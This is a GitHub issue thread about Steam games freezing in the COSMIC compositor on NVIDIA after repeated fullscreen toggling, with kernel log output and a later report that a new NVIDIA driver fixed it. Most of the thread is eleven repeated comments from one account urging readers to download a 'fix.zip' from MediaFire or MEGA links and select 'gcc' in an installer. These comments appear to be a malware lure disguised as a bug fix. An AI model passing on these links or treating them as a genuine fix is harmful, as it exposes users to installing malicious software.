### ISSUE TITLE
Steam games eventually freeze if fullscreen toggled multiple times

### ISSUE THREAD

**Issue by aekobear** [pop-os/cosmic-comp#728]
Running the nvidia alpha ISO with apt pointed at popdev:master and the latest commits installed

I can reliably reproduce this with any fullscreen steam game by hitting `alt + Enter` to toggle between fullscreen and windowed mode repeatedly. The game eventually freezes and becomes unresponsive. However, I can still hit `alt + Enter` to put the unresponsive game into windowed mode so that in can be quit by hitting the `X` in the corner

When the game becomes unresponsive, journalctl gets spammed with dozens of these errors:

>Aug 14 16:51:58 pop-os kernel: [drm:nv_drm_gem_alloc_nvkms_memory_ioctl [nvidia_drm]] *ERROR* [nvidia-drm] [GPU ID 0x00000100] Failed to allocate NVKMS memory for GEM object
>Aug 14 16:51:58 pop-os kernel: [drm:nv_drm_gem_alloc_nvkms_memory_ioctl [nvidia_drm]] *ERROR* [nvidia-drm] [GPU ID 0x00000100] Failed to allocate NVKMS memory for GEM object
>Aug 14 16:52:22 pop-os kernel: [drm:nv_drm_gem_alloc_nvkms_memory_ioctl [nvidia_drm]] *ERROR* [nvidia-drm] [GPU ID 0x00000100] Failed to allocate NVKMS memory for GEM object
>Aug 14 16:52:22 pop-os kernel: [drm:nv_drm_gem_alloc_nvkms_memory_ioctl [nvidia_drm]] *ERROR* [nvidia-drm] [GPU ID 0x00000100] Failed to allocate NVKMS memory for GEM object

The error is identical for every game that I've tested (Nier Automata, Earth Defense Force 6, Valheim)

Also while I can reproduce the error quickly by spamming alt+Enter, I first noticed it happening during a normal gaming session. I have a dual-monitor set-up and will occasionally focus windows on my other monitor, which seems to cause the fullscreen game to briefly minimize then maximize again. Doing this casually over the course of a night caused 2 or 3 crashes, so the behavior doesn't need to be spammed to happen, it's just more quick to happen when spammed.

Let me know if there are additional logs beyond journalctl which could be helpful

**Comment by caio-passos** [comment]
A simmilar behavior happens with GTA V too. I also have a dual monitor set-up, and when I switch to another program with ALT+TAB, the game becomes blank(no image). Also, random freezes followed by blank screen. 

I'm using ProtonDB 9.0

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by aekobear** [comment]
good news, I installed the latest nvidia driver (560.31.02) which had this in the release highlights:

> Fixed a bug that could cause the display to freeze when presenting windows using Wayland direct scanout on multiple monitors.

And I've been able to play without any freezes ever since. I'm going to give it one more day of testing to be sure, then close this issue
